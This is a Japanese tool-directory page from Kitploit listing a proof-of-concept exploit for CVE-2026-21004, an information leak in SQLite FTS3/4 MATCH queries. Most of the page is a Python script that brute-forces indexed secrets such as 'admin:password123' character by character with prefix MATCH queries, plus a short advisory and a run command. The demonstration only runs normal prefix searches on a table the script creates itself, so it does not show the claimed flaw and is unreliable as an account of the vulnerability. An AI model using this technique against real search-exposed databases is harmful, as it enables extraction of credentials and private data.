Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting — CVE-2026-21004 の概念実証エクスプロイト: 巧妙に細工した SQLite FTS3/4 の MATCH プレフィックスクエリをブラインドオラクルとして使用し、インデックス化された秘密データを1文字ずつ復元します。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting
脆弱性分析エクスプロイトデータ流出データベースセキュリティ
GitHubgeorge0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting

CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting

CVE-2026-21004 の概念実証エクスプロイト: 巧妙に細工した SQLite FTS3/4 の MATCH プレフィックスクエリをブラインドオラクルとして使用し、インデックス化された秘密データを1文字ずつ復元します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
16日前未レビュー

CVE-2026-21004 – クエリ作成によるSQLite FTS3 Match情報漏洩

プログラムコード(Python)

root@kitploit:~
# sqlite_fts_leak.py - Creates FTS table and exploits match info
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute("CREATE VIRTUAL TABLE secrets USING fts4(content TEXT)")
conn.execute("INSERT INTO secrets VALUES ('admin:password123')")
conn.execute("INSERT INTO secrets VALUES ('user:secret456')")

# Attacker guesses characters using FTS MATCH with partial matching
def guess_char(prefix, known):
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_:":
        query = f'SELECT * FROM secrets WHERE content MATCH ?'
        # In FTS4, MATCH can leak whether a term exists; we abuse by searching column directly
        try:
            cur = conn.execute(query, (f'"{prefix}{c}*"',))
            if cur.fetchone():
                return c
        except:
            pass
    return None

# Recover the secret character by character
prefix = ""
for _ in range(20):
    c = guess_char(prefix, "")
    if c is None: break
    prefix += c
print(f"Recovered: {prefix}")

CVE-2026-21004 – SQLite FTS3/4 Match情報漏洩

Severity: High

概要

SQLite FTS4を使用するアプリケーションは、MATCHクエリに基づいて結果を返す検索機能を公開しています。一致するかどうか(またはタイミングの差)を観察することで、攻撃者は全文インデックスの内容を1文字ずつブルートフォースし、機密データを抽出できます。

脆弱性の詳細

  • タイプ: 情報漏洩 / ブラインドインジェクション
  • 影響: インデックス化されたカラムからのデータ外部流出。
  • 根本原因: FTS MATCH演算子はプレフィックスクエリ(term*)をサポートしており、攻撃者は完全な用語を知らなくても辞書攻撃を実行できます。

エクスプロイトのデモ

エクスプロイトを実行します:

root@kitploit:~
python sqlite_fts_leak.py

このスクリプトは、secretsテーブルの内容を段階的に復元します。

ツールをダウンロード